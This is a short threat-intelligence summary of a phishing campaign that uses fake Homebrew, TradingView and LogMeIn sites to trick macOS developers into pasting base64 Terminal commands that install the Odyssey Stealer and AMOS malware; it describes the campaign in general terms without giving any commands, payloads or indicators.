VERY IMPORTANT

A sophisticated campaign targeting macOS developers has been uncovered, utilizing fake websites impersonating trusted platforms like Homebrew, TradingView, and LogMeIn to distribute Odyssey Stealer and AMOS malware. The attackers employ social engineering tactics, prompting users to paste base64-encoded commands in Terminal, which downloads malicious payloads. Over 85 phishing domains were identified, linked through shared SSL certificates and infrastructure. The campaign's infrastructure includes long-standing IP addresses showing multi-year activity. The malware attempts privilege escalation, performs anti-analysis checks, and disrupts backup services. This coordinated operation demonstrates the attackers' ability to adapt tactics and maintain persistence in the macOS ecosystem.